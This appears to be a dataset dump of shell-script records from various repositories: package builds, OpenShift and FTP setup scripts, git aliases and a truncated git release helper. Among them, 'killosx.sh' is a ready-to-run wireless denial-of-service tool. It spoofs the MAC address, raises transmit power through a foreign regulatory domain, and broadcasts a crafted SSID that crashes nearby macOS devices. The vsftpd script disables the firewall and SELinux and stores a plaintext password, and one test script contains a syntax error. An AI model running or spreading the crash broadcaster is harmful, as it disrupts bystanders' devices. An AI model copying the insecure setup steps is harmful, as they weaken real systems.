blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
642659d84ec7a594f8e3ea8855d12c9ee18120b9 | Shell | delkyd/alfheim_linux-PKGBUILDS | /neptune-cli/PKGBUILD | UTF-8 | 1,299 | 2.5625 | 3 | [
"Apache-2.0"
] | permissive | # Maintainer: grzegorz225 <gorbak25@gmail.com>
pkgname=neptune-cli
_module='neptune-cli'
pkgver=2.0.24
pkgrel=1
pkgdesc="Neptune client library"
arch=('any')
url="https://neptune.ml/"
license=('Apache')
depends=('python' 'python-virtualenv' 'python-pip' 'python-pillow')
source=("LICENSE")
sha256sums=("cfc7749b96f63bd31c3c42b5c471bf756814053e847c10f3eb003417bc523d30")
build() {
cd "${srcdir}"
virtualenv3 ./neptune-cli
./neptune-cli/bin/pip install --no-compile -U neptune-cli
yes | ./neptune-cli/bin/pip uninstall pillow
virtualenv3 --relocatable ./neptune-cli
sed -i "s?${srcdir}?/opt?" ./neptune-cli/bin/activate
sed -i -e "s@fin.read()@ b\"import sys\\\\nsys.path.append(\\\\\"/usr/lib/python3.6/site-packages\\\\\")\\\\n\"+&@" ./neptune-cli/lib/python3.6/site-packages/past/builtins/misc.py
}
package() {
cd "${pkgdir}"
mkdir "./opt/"
cp -r "${srcdir}/neptune-cli" "./opt/"
mkdir "./usr"
mkdir "./usr/bin"
cp -r "/usr/lib/python3.6/site-packages/PIL" "./opt/neptune-cli/lib/python3.6/site-packages/PIL"
echo "#!/usr/bin/env bash
source /opt/neptune-cli/bin/activate
function finish {
deactivate
}
trap finish EXIT
/opt/neptune-cli/bin/neptune \$*" > ./usr/bin/neptune
chmod +x ./usr/bin/neptune
}
| true |
1a8c4180b40c87bff178505d4f46839f3c752d05 | Shell | cpbennett/openbsd-wip | /graphics/dcmtk/files/regress.sh | UTF-8 | 351 | 3.328125 | 3 | [] | no_license | #!/bin/sh
MODS_HAVE_TESTS="dcmwlm ofstd"
set -e
test_ofstd() {
ls | while read f; do
file "$f" | fgrep executable >/dev/null || continue
echo "=====> Running test $f"
./"$f"
done
}
test_dcmwlm() {
# ls ../wlistqry/*.dump |
}
for m in ${MODS_HAVE_TESTS}; do
echo "====> Running tests for module $m"
(eval "cd $m/tests && test_$m")
done
| true |
f4365c1a2d2c33328901f4e1471d3589e95b3e9d | Shell | michaelepley/openshift-demo-simple | /config/config-demo-default.sh | UTF-8 | 1,776 | 3.34375 | 3 | [] | no_license | #!/bin/bash
[[ -v CONFIGURATION_DEFAULT_COMPLETED ]] && echo "Using default configuration" && { return || exit ; }
# set to "false" to disable the echoing of configuration information
CONFIGURATION_DISPLAY=false
OPENSHIFT_DOMAIN_DEFAULT=rhsademo.net
OPENSHIFT_MASTER_PRIMARY_DEFAULT=master.${OPENSHIFT_DOMAIN_DEFAULT}
OPENSHIFT_APPS_PRIMARY_DEFAULT=apps.${OPENSHIFT_DOMAIN_DEFAULT}
OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT=proxy.${OPENSHIFT_DOMAIN_DEFAULT}
OPENSHIFT_USER_PRIMARY_DEFAULT=${USER}
OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT='password1!'
OPENSHIFT_PROJECT_PRIMARY_DEFAULT=${OPENSHIFT_USER_PRIMARY_DEFAULT}-default
OPENSHIFT_APPLICATION_NAME_DEFAULT=${OPENSHIFT_USER_PRIMARY_DEFAULT}-app
OPENSHIFT_OUTPUT_FORMAT_DEFAULT=json
if [ "$CONFIGURATION_DISPLAY" != "false" ]; then
echo "Default Configuration_______________________________________"
echo " OPENSHIFT_DOMAIN_DEFAULT = ${OPENSHIFT_DOMAIN_DEFAULT}"
echo " OPENSHIFT_MASTER_PRIMARY_DEFAULT = ${OPENSHIFT_MASTER_PRIMARY_DEFAULT}"
echo " OPENSHIFT_APPS_PRIMARY_DEFAULT = ${OPENSHIFT_APPS_PRIMARY_DEFAULT}"
echo " OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT = ${OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT}"
echo " OPENSHIFT_USER_PRIMARY_DEFAULT = ${OPENSHIFT_USER_PRIMARY_DEFAULT}"
echo " OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT = `echo ${OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT} | md5sum` (obfuscated)"
echo " OPENSHIFT_PROJECT_PRIMARY_DEFAULT = ${OPENSHIFT_PROJECT_PRIMARY_DEFAULT}"
echo " OPENSHIFT_APPLICATION_NAME_DEFAULT = ${OPENSHIFT_APPLICATION_NAME_DEFAULT}"
echo " OPENSHIFT_OUTPUT_FORMAT_DEFAULT = ${OPENSHIFT_OUTPUT_FORMAT_DEFAULT}"
echo "____________________________________________________________"
fi
CONFIGURATION_DEFAULT_COMPLETED=true | true |
0921753eb63fa2263f3d4f8c6e2f7b8c3d6b88db | Shell | li-weibiao/shell-- | /auto_config_vsftpd_virtual_v3.sh | UTF-8 | 1,434 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#2020年8月21日 14:46:10
#auto config ${FTP_DAEMON} user
#by author li
##################
FTP_YUM="yum -y install"
FTP_DIR="/etc/${FTP_DAEMON}/"
FTP_DB="${FTP_DAEMON}_login"
FTP_VIR="jfedu001"
FTP_DAEMON="vsftpd"
FTP_USR="ftpuser"
FTP_USR_CNF="${FTP_DAEMON}_user_conf"
$FTP_YUM ${FTP_DAEMON}*
rpm -qa | grep ${FTP_DAEMON}
systemctl restart ${FTP_DAEMON}.service
$FTP_YUM pam* libdb-utils libdb* --skip-broken
touch $FTP_DIR/${FTP_USR}s.txt
echo "$FTP_VIR
123456" > $FTP_DIR/${FTP_USR}s.txt
db_load -T -t hash -f $FTP_DIR/${FTP_USR}s.txt $FTP_DIR/${FTP_DB}.db
chmod 700 $FTP_DIR/${FTP_DB}.db
echo "auth required pam_userdb.so db=$FTP_DIR/${FTP_DB}
account required pam_userdb.so db=$FTP_DIR/${FTP_DB}">/etc/pam.d/${FTP_DAEMON}
useradd -s /sbin/nologin ${FTP_USR}
echo "
#config virtual user FTP
pam_service_name=${FTP_DAEMON}
guest_enable=YES
guest_username=${FTP_USR}
user_config_dir=$FTP_DIR/${FTP_USR_CNF}
virtual_use_local_privs=YES
">>$FTP_DIR/${FTP_DAEMON}.conf
mkdir -p $FTP_DIR/${FTP_USR_CNF}/
touch $FTP_DIR/${FTP_USR_CNF}/$FTP_VIR
echo "
local_root=/home/${FTP_USR}/jfde001
write_enable=YES
anon_world_readable_only=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
">$FTP_DIR/${FTP_USR_CNF}/$FTP_VIR
mkdir -p /home/${FTP_USR}/$FTP_VIR
chown -R ${FTP_USR}:${FTP_USR} /home/${FTP_USR}
systemctl restart ${FTP_DAEMON}.service
systemctl stop firewalld.service
setenforce 0
| true |
b821fac75f8b35735918183755e59ca6c22856f0 | Shell | DalavanCloud/libreoffice-linguistic-tools | /LinguisticTools/build/edit_code.sh | UTF-8 | 709 | 2.703125 | 3 | [] | no_license | #!/bin/sh
# Created 28-Jan-2013 by Jim K
#
# Open all code in pythonpath for editing using Vim, with each package in
# a separate window.
#
BASEPATH="/media/OurDocs/computing/Office/OOLT/LinguisticTools/pythonpath"
gvim "$BASEPATH/lingt/UI/"*.py &
# Wait for window to open before opening another one,
# so that it appears in the correct order in the task bar.
sleep 2
gvim "$BASEPATH/lingt/App/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Access/Writer/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Access/Calc/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Access/PlainText/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Access/Xml/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Access/"*.py &
sleep 2
gvim "$BASEPATH/lingt/Utils/"*.py &
sleep 1
| true |
fe0a9e1b9b2569a27cb10d2f05b8e2b09c18252e | Shell | huanglongyu/bin | /unpackfsimg | UTF-8 | 1,656 | 3.859375 | 4 | [] | no_license | #!/bin/bash
echo "InputFile : ${1}"
####################################
# #
#TODO:to judge the img not depends #
# on filename #
# #
####################################
# below expressions annotated needs help #
#if [ "${1}" != 'img\$' ] ;then
#if [[ "${1}" =~ \.img$ ]] ;then
if [ "`echo ${1} | grep -o "\.img$"`" != ".img" ] ;then
echo -e "\n"
echo "the file is not a img, exit"
echo "---------erro---------"
#rm ${1}.back 2>/dev/null
exit 1;
fi
unpackDir=`echo ${1##*/} | awk -F. '{print $1}'`
outputDir=
currentPath=`pwd`
rawImg=${currentPath}/`echo ${1##*/}`.raw
##### first backup the img #####
cp -f ${1} ${currentPath}/`echo ${1##*/}`.back 2>/dev/null
if [ -d ${unpackDir} ];then
echo "already exit the ${unpackDir} dir,make ${unpackDir}.back instead "
sudo umount ${unpackDir}.back 2>/dev/null
sudo rm -rf ${unpackDir}.back 2>/dev/null
sudo umount ${unpackDir} 2>/dev/null
sudo rm ${rawImg} 2>/dev/null
sudo mkdir ${unpackDir}.back
outputDir=${unpackDir}.back
else
echo "make dir : ${unpackDir}"
mkdir ${unpackDir}
outputDir=${unpackDir}
fi
cmd="simg2img ${1} ${rawImg}"
if ${cmd} ;then
sudo mount -t ext4 ${rawImg} ${outputDir}
sudo chown -R ${USER}:${USER} ${outputDir}
else
echo -e "\n"
echo "exe simg2img failed,exit"
echo "---------erro---------"
exit 1;
fi
#simg2img ${1} ${rawImg}
#result=`echo $?`
#if [ ${result} -eq 0 ];then
# sudo mount -t ext4 ${rawImg} ${outputDir}
#fi
echo -e "\n"
echo "OutputDir : ${outputDir}"
echo "---------success---------"
| true |
08bb98a30466d3b9a4e8915c74e3922c2c45e732 | Shell | jameswinegar/self-support-scripts | /publisher.sh | UTF-8 | 708 | 3.9375 | 4 | [] | no_license | #!/usr/bin/env bash
# move desktop, scripts, and service files to appropriate locations
for FOLDER in Hashicorp
do
rsync -avzh --include='*/' --include="*.desktop" --exclude="*" $FOLDER/ /usr/share/applications/
rsync -avzh --include='*/' --include="*.sh" --exclude="*" $FOLDER/ /usr/local/bin/
rsync -avzh --include='*/' --include="*.service" --exclude="*" $FOLDER/ /etc/systemd/system/
done
# create an array of all services
declare -a array
find . -name "*.service" -exec basename {} \; > /tmp/tmpfile
readarray -t array < /tmp/tmpfile
rm -f /tmp/tmpfile
# for each service, enable and start the service
for SERVICE in "${array[@]}"
do
systemctl enable $SERVICE
systemctl start $SERVICE
done
| true |
603bc78b8236dcb23498f735c0ee49624935548d | Shell | kzgs/soap4r-1.9 | /test/soap/ssl/install_certs.sh | UTF-8 | 1,060 | 2.796875 | 3 | [] | no_license | #!/usr/bin/env bash
echo "this script does not work;"
echo "the ssl test does not work either"
exit
rm myCA -fr
conf=../openssl.my.cnf
mkdir -m 0755 ./myCA ./myCA/private ./myCA/certs ./myCA/newcerts ./myCA/crl
pushd ./myCA > /dev/null
touch ./index.txt
echo '01' > ./serial
#create the server private key
openssl req -config $conf -new -x509 -keyout ./private/server.key -out ./certs/server.crt -days 1825
#create the CA certificate and key
openssl req -config $conf -new -x509 -keyout ./private/ca.key -out ./certs/ca.crt -days 1825
#create the certificate request
openssl req -config $conf -new -nodes -keyout ./private/server.key -out ./server.csr -days 365
#sign the certificate request
openssl ca -config $conf -policy policy_anything -out certs/ca.cert -infiles ./server.csr
rm -f ./server.csr
#verify the cert
openssl x509 -subject -issuer -enddate -noout -in ./certs/ca.crt
popd > /dev/null
#chmod 0400 ./myCA/private/server.key
# chown root.apache /etc/pki_jungle/myCA/private/server.key
# chmod 0440 /etc/pki_jungle/myCA/private/server.key | true |
3bdf519001b5464bec9ac8028a4bdfec0689f518 | Shell | Landers1037/jjservice-go | /shell/backup/backup_jjmail.sh | UTF-8 | 151 | 2.640625 | 3 | [] | no_license | #!/usr/bin/env bash
apps_root="/home/apps"
function backup_jjmail()
{
zip -q -o -r jjmail.zip "${apps_root}"/jjmail || exit 1
}
backup_jjmail
exit 0 | true |
44d29ac5e4852cba321d055629dc9fe1dc8ccee6 | Shell | bfildier/Fildier2020 | /SAM_scripts/process_outputs/compareStep.sh | UTF-8 | 622 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Reference time step
ref_step=576000
#file=RCE_MPDATAxTKExCAMxSAM1MOM_4000x4000x15_256x256x64_TKE-SST302-radhomo-r1_256_0000288720.nc
#file=$1
files=$*
for file in `echo $files`; do
# Extract suffix containing time step from file
suffix=${file##*_}
# Extract time step from suffix
step=${suffix%*.nc}
echo $step
# Trim leading zeros
num=$(echo $step | sed 's/^0*//')
echo $num
# Compare with reference time step
if [[ $num -lt ${ref_step} ]]; then
echo "${file##*/} before ${ref_step}"
else
echo "${file##*/} after ${ref_step}"
fi
done
| true |
7d959aeeb73a28dc602c7b7e8d3d93597394517e | Shell | pete0emerson/tendril | /scripts/build.sh | UTF-8 | 639 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex
buildTime=$(date +%s)
buildDate=$(date -d @${buildTime} -u "+%Y-%m-%d %H:%M:%S UTC")
buildHash=$(git rev-parse HEAD)
if [ ! -z "$(git status --porcelain)" ]; then
buildHash="$buildHash (with uncommitted changes)"
fi
buildVersion="development"
buildOS=$(uname -s | tr 'A-Z' 'a-z')
buildInstallMethod=make
mkdir -p bin
for app in $(ls cmd) ; do
cd cmd/$app
go build\
-ldflags "-X 'main.buildDate=${buildDate}'
-X 'main.buildHash=${buildHash}'
-X 'main.buildVersion=${buildVersion}'
-X 'main.buildOS=${buildOS}'
-X 'main.buildInstallMethod=${buildInstallMethod}'" \
-o ../../bin/$app
cd ..
done
| true |
06cae4f3da55dd3fc7ad290b2d110e13ee3d7a73 | Shell | toddyamakawa/bin | /,nnn | UTF-8 | 1,963 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
declare -r CURRENT_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]}")")"
# More info here:
# https://github.com/jarun/nnn/blob/master/misc/quitcd/quitcd.bash_zsh
#
# The default behaviour is to cd on quit (nnn checks if NNN_TMPFILE is set)
# To cd on quit only on ^G, remove the "export" as in:
# NNN_TMPFILE="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd"
# NOTE: NNN_TMPFILE is fixed, should not be modified
export NNN_TMPFILE="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd"
# 0 = black
# 1 = red
# 2 = green
# 3 = yellow
# 4 = blue
# 5 = magenta
# 6 = cyan
# 7 = white
export NNN_COLORS='4231'
# Use _ for arbitrary non-background CLI commands
# Use * to skip user confirmation
# Use _| to run a GUI app
# Use -_ to disable directory refresh
NNN_PLUG='g:_git status'
NNN_PLUG+=';b:_nnn-bookmarks*'
NNN_PLUG+=';e:_,env'
#NNN_PLUG+=';h:_cdhome*'
#NNN_PLUG+=';H:_cdhome'
NNN_PLUG+=';P:preview-tui'
#NNN_PLUG+=';a:bookmarks'
NNN_PLUG+=';o:fzopen'
NNN_PLUG+=';p:_nnn-cd-clipboard*'
NNN_PLUG+=';s:_nnn-show-selection'
NNN_PLUG+=';y:-_,clip $nnn*'
NNN_PLUG+=';z:_nnn-zsh*'
export NNN_PLUG
# TODO: Figure out how to get this to work
#open_with="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/plugins/nuke"
#[[ -f "$open_with" ]] && export NNN_OPENER="$open_with"
# Use `less` as opener
export PAGER='less'
export LESS='-Ri'
export NNN_OPENER=less
# Fix ordering
export LC_ALL=C
# Check key collisions
nnn -K
# Open FIFO
export NNN_FIFO="$(mktemp --suffix=-nnn -u)"
(umask 077; mkfifo "$NNN_FIFO")
# Open preview pane
if [[ -e ${TMUX%%,*} ]]; then
width=$(($(tput cols)-50))
tmux split-window -dh -l $width nnn-preview $NNN_FIFO
#tmux split-window \
#-dh \
#-e "NNN_FIFO=$NNN_FIFO" \
#-l $width zsh
fi
# Run nnn
# -c: cli-opener
# -d: detail mode
nnn -c $@
# Clean up FIFO
rm "$NNN_FIFO"
# Print the contents of $NNN_TMPFILE
#if [[ -f "$NNN_TMPFILE" ]]; then
#echo "NNN_TMPFILE: $(cat $NNN_TMPFILE)"
#rm -f $NNN_TMPFILE
#fi
| true |
b1381c6c151550091f900cbee775a21241c8b807 | Shell | Callisto13/dotfiles | /config/bash/git.bash | UTF-8 | 935 | 3.140625 | 3 | [] | no_license | ## Everything related to git goes here.
# Environment Variables
export GIT_DUET_GLOBAL=true
export GIT_DUET_CO_AUTHORED_BY=1
export GIT_DUET_ROTATE_AUTHOR=1
# Git aliases
alias git="LANG=en_GB git"
alias duet='git duet --global'
alias gap="git add -p"
alias gp="git push"
alias gst='git status'
alias gsu="git submodule update --init --recursive"
alias gpr="git pull --rebase"
alias solo='git solo --global'
alias gti='git'
alias ga='git add .'
## Custom Functions
# Add committer initials to the git prompt info
# TODO can this be simplified by using a plugin instead?
function git_prompt_info {
git_prompt_vars
GIT_DUET_INITIALS=$(echo $(git config --get-regexp ^duet.env.git-.*-name | sed -e 's/^.*-name //' | tr 'A-Z' 'a-z' | sed -e 's/\([a-z]\)[^ +]*./\1/g' ) | sed -e 's/ /+/')
GIT_PAIR=${GIT_DUET_INITIALS:-`git config user.initials | sed 's% %+%'`}
echo -e " $GIT_PAIR$SCM_PREFIX$SCM_BRANCH$SCM_STATE$SCM_SUFFIX"
}
| true |
69d049475b3ec1e5cf91d392553ebcee043687b8 | Shell | vinivsb/my-configs | /git-alias.sh | UTF-8 | 485 | 2.75 | 3 | [] | no_license | add_aliases(){
git config --global alias.st "status -s"
git config --global alias.lg "log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --date=relative"
git config --global alias.aa "add ."
git config --global alias.who "shortlog -sn"
git config --global alias.undo "reset --hard HEAD"
git config --global alias.ld "log --stat --graph"
git config --global alias.compare "git diff --stat --color"
}
add_aliases
| true |
cb482955d0dad86e8c4b3b94688e1e1f0c94420f | Shell | 533k3r5y7yf/killosx | /killosx.sh | UTF-8 | 2,130 | 3.328125 | 3 | [] | no_license | #!/bin/bash
## killOSX Copyright 2013, d4rkcat (thed4rkcat@yandex.com)
#
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
#
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License at (http://www.gnu.org/licenses/) for
## more details.
fexit()
{
echo
airmon-ng stop $MON1 | grep fff
echo $RED" [*] $MON1 has been shut down,$GRN Goodbye...$RST"
exit
}
iw reg set BO
RED=$(echo -e "\e[1;31m")
BLU=$(echo -e "\e[1;36m")
GRN=$(echo -e "\e[1;32m")
RST=$(echo -e "\e[0;0;0m")
trap fexit 2
case $1 in
"-i")NIC=$2;;
"-h")echo $GRN"""killOSX$RST
Usage - killosx -i wlan0 ~ Run exploit on wlan0
killosx -h ~ This help";exit
esac
if [ $NIC -z ] 2> /dev/null
then
echo $RED""" [>] Which interface do you want to use?:
"
WLANS="$(ifconfig | grep wlan | cut -d ' ' -f 1)"
for WLAN in $WLANS
do
echo " [>] $WLAN"
done
echo $BLU
read -p " > wlan" NIC
if [ ${NIC:0:4} = 'wlan' ] 2> /dev/null
then
A=1
else
NIC="wlan"$NIC
fi
echo $GRN;MON1=$(airmon-ng start $NIC | grep monitor | cut -d ' ' -f 5 | head -c -2);echo " [*] Started $NIC monitor on $MON1"
else
echo $GRN;MON1=$(airmon-ng start $NIC | grep monitor | cut -d ' ' -f 5 | head -c -2);echo " [*] Started $NIC monitor on $MON1"
fi
echo
echo $GRN" [*] Changing MAC and attempting to boost power on $NIC"
ifconfig $NIC down
iwconfig $NIC txpower 30 2> /dev/null
sleep 0.5
ifconfig $NIC up
echo
ifconfig $MON1 down
macchanger -a $MON1
ifconfig $MON1 up
echo $RED"""
[*] Setting ESSID to 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ'
[*] All vulnerable Osx in the area is toast.
[>] Press Ctrl+C to exit
"$BLU
airbase-ng -e 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ' -I 50 -i $MON1 $MON1
| true |
59bf110be674acee7e434932c776d68268398b81 | Shell | unamatasanatarai/dotfiles | /stow/bin/psls | UTF-8 | 1,476 | 3.875 | 4 | [] | no_license | #!/usr/bin/env bash
set -euo pipefail
. "$(dirname "$0")"/.lib
VERSION="1.0"
# ------------------------------------------------------------
# PRIVATE
# ------------------------------------------------------------
function dokill {
local ps
ps=$(echo "$*" | awk '{print $1}')
kill "$ps"
ealert "killed"
}
function dokill9 {
local ps
ps=$(echo "$*" | awk '{print $1}')
kill -9 "$ps"
ealert "Kill-9ed"
}
export -f dokill
export -f dokill9
# ------------------------------------------------------------
# PUBLIC interfaces
# ------------------------------------------------------------
function list_all {
local list
list=$(ps -e)
echo "${list[@]}" | \
fzf \
--header "CTRL+x: kill; CTRL+X: kill -9" \
--scroll-off 2 \
--prompt "ps -e >> " \
--bind "ctrl-x:select+preview(dokill {})" \
--bind "ctrl-X:select+preview(dokill9 {})" \
--preview-window "right,30%"
}
function help {
echo "$(basename "$0") <options>
version $VERSION
Options:
--help This help message
--version Display the version number (it is $VERSION)
"
}
# ------------------------------------------------------------
# ROUTER
# ------------------------------------------------------------
while [[ -n ${1:--help} ]]; do
case ${1:--help} in
--version )
echo "version: $VERSION"
exit 0
;;
--help )
help
exit 0
;;
*)
list_all "$@"
shift
exit 0
;;
esac
shift
done
| true |
9ab7f9d4c9e4608c51b241c89e4a913f02154f72 | Shell | MarioMohr/dotfiles_of_mariomohr | /.bash_aliases | UTF-8 | 1,216 | 3.671875 | 4 | [] | no_license | # enable color support if possible
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias grep='grep --color=auto'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias ip='ip -color=auto'
# ls does list directories first and file sizes are human-readable
alias ls='ls --color=auto --group-directories-first --human-readable'
fi
# long listing of directory content, including dotfiles
alias ll='ls -laA'
# long listing of directory content, including dotfiles and sort them by date (new entries are at the bottom)
alias lt='ls -ltra'
# list directories only
function lsd(){
ls -laA "$@" | grep ^d | awk '{print $9}' | column
}
# use ls after cd
function CD_LS(){
cd "$@" && ls .
}
alias cd='CD_LS'
# don't remove, instead move to trash (.local/share/Trash/files/)
# Remove trash via "gio trash --empty"
function MOVE2TRASH(){
if [ -n "$XDG_CURRENT_DESKTOP" ]; then
hash gio && gio trash "$@"
else
echo "Removing file(s) is a bad habbit, instead you should move or rename them."
echo "If you really have to remove some thing(s) you can use the full path i.e. /bin/rm"
fi
}
alias rm='MOVE2TRASH'
| true |
316e139827c5029862deff18513ac089774e040b | Shell | irony0egoist/scf-proxy | /build.sh | UTF-8 | 138 | 2.515625 | 3 | [] | no_license |
#!/bin/bash
work_path=$(cd `dirname $0`/../; pwd)
echo $work_path
GOOS=linux GOARCH=amd64 go build -o main cmd/main.go
zip main.zip main | true |
81904245ac6fd067efba41245bc916ea397deed5 | Shell | xaiki/odeon-downloader | /incaa-dl.sh | UTF-8 | 1,078 | 2.890625 | 3 | [] | no_license | #!/bin/sh
INCAA_KEY=`cat incaa.key`;
INCAA_PERFIL=`cat incaa.perfil`;
set -x
while read d; do
(cd $d &&
i=`cat data.json | grep \"sid\" | head -1 |cut -d\: -f2 | sed s/' '//g` &&
title=`cat data.json | grep \"tit\" | head -1 | cut -d\" -f4` &&
titlep=`echo $title | sed s/' '/'_'/g` &&
curl "https://player.odeon.com.ar/odeon/?i=$i&p=$INCAA_PERFIL&s=INCAA&t=$INCAA_KEY" -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: https://www.odeon.com.ar/' -H 'Connection: keep-alive' --compressed > player.page
surl=`cat player.page | grep "file: 'http" | cut -d"'" -f2 | sed s/"'"//` &&
ffmpeg -i "$surl" -acodec copy -vcodec copy -copyts $titlep.ts
)
done
| true |
1d784e35ac34475ae3ece412209b629ab1305985 | Shell | lvps/389ds-examples | /ca/cert.sh | UTF-8 | 808 | 3.03125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
HOSTNAME=${1:-ldaptest.example.local}
ID=${HOSTNAME//\./_}
export SAN=$HOSTNAME
if [[ ! -f noise.bin ]]; then
openssl rand -out noise.bin 4096
fi
if [[ -f ${ID}_cert.pem ]] && [[ -f ${ID}.key ]]; then
echo "Reusing previous certificate"
else
# https://security.stackexchange.com/a/86999
openssl req -x509 -newkey rsa:2048 -sha256 -keyout ${ID}.key -out ${ID}_cert.pem -days 365 -nodes -extensions eku -config openssl.cnf -subj "/CN=${HOSTNAME}"
fi
# https://stackoverflow.com/a/4774063
HERE="$( cd "$(dirname "$0")" ; pwd -P )"
echo --- Add this to the playbook ---
echo "dirsrv_tls_cert_file: \"$HERE/${ID}_cert.pem\""
echo "dirsrv_tls_key_file: \"$HERE/${ID}.key\""
echo "dirsrv_tls_files_remote: false"
echo "dirsrv_tls_certificate_trusted: false"
echo --------------------------------
| true |
546cf6cb6c26b38921721b8381b3901407114b3e | Shell | SteDeshain/dotfiles | /dotfiles/bashrc | UTF-8 | 914 | 2.890625 | 3 | [] | no_license | #
# ~/.bashrc
#
# If not running interactively, don't do anything
[[ $- != *i* ]] && return
alias ls='ls --color=auto'
#PS1='[\u@\h \W]\$ '
export PS1='\[\033[01;32m\]\u@\h\[\033[00m\]\[\033[0;33m\][\t]\[\033[01;34m\]\w\[\033[00m\]\$ '
# alias to restart iwd.service
alias fixwifi='sudo systemctl restart iwd.service'
# alias to ping to www.baidu.com for testing the network connection
alias testinet='ping www.baidu.com'
# alias to add executable permissions to a file
alias addx='chmod +x'
# alias to set screen layout
alias sd='~/.screenlayout/dual-with-desktop-monitor.sh && ~/.fehbg'
alias stv='~/.screenlayout/dual-with-tv.sh && ~/.fehbg'
alias stvs='~/.screenlayout/dual-with-tv-slant.sh && ~/.fehbg'
alias ss='~/.screenlayout/single-monitor.sh && ~/.fehbg'
# show tty-clock
alias clock='tty-clock -s -c -n'
# alias to refresh current pwd
alias fr='cd $(pwd)'
alias lg='lazygit'
alias ra='ranger'
| true |
4227a7263b0c5b8145c77a9bf89367ecef154b82 | Shell | LeaveAirykson/git-nextflow | /commands/git-release | UTF-8 | 17,247 | 4.125 | 4 | [] | no_license | #!/bin/bash
# shellcheck disable=SC2063,SC2129,SC2181,SC2162
# Usage:
# git release create|c version
# # git release publish|p version
# # git release finish|f version
red="\033[31m"
green="\033[32m"
yellow="\033[33m"
normal="\033[0m"
# =================================
# DEFINE VARIABLES/DEFAULTS
# =================================
# Set default subcommand
CMD=${1:-create}
# make sure the aliases trigger the right
# subcommand
case "$CMD" in
c | create)
CMD='create'
;;
p | publish)
CMD='publish'
;;
f | finish)
CMD='finish'
;;
esac
# get the settings from git config
RELEASEPREFIX=$(git config --get nextflow.prefix.release || echo 'release/')
NEXTBRANCH=$(git config --get nextflow.branch.next || echo 'develop')
MAINBRANCH=$(git config --get nextflow.branch.main || echo 'master')
VERSIONPREFIX=$(git config --get nextflow.prefix.version || echo 'v')
STRATEGY=$(git config --get nextflow.general.strategy || echo 'alternate')
COMPAREURL=$(git config --get nextflow.general.compareurl)
COMMITURL=$(git config --get nextflow.general.commiturl)
TICKETURL=$(git config --get nextflow.general.ticketurl)
TICKETPATTERN=$(git config --get nextflow.prefix.ticket)
TMPRELEASEMSG="_tmp-release-message.md"
HASREMOTE=0
# determine if a remote exists at all
if grep 'remote' .git/config &>/dev/null; then
HASREMOTE=1
fi
# make sure the 'next' branch exists
# use the 'main' branch as a fallback
if ! git rev-parse --quiet --verify "$NEXTBRANCH" &>/dev/null; then
NEXTBRANCH=$MAINBRANCH
fi
# build final versiontag name and branch name
VERSIONNUMBER=$2
# tag name for new version
VERSIONTAG=${VERSIONPREFIX}${VERSIONNUMBER}
# the new release/ branch
RELEASEBRANCH="${RELEASEPREFIX}${VERSIONTAG}"
# tests for a clean state
WORKINGDIRDIRTY=$(git status --porcelain)
CURRENTBRANCH=$(git branch --show-current)
# do work based on used strategy option
if [ "$STRATEGY" == "alternate" ]; then
# this will set the LASTVERSION and CURRENTVERSION based on
# annotated tags and data from package.json
LASTVERSION="$(git rev-list --max-parents=0 HEAD)"
CURRENTVERSION=$(cat package.json | grep version | head -1 | awk -F: '{ print $2 }' | sed 's/[",]//g' | tr -d '[[:space:]]')
if git describe --abbrev=0 "$MAINBRANCH" &>/dev/null; then
LASTVERSION=$(git describe --abbrev=0 "$MAINBRANCH")
fi
else
# third parameter is used as a reference to branch off from.
NEXTBRANCH=${3:-$NEXTBRANCH}
fi
# =================================
# FUNCTIONS
# =================================
# Help function showing usage of the command
usage() {
echo -e "Usage:\ngit release create|c [version] [commit]\n"
echo -e "git release publish|p [version]"
echo -e "git release finish|f [version]\n"
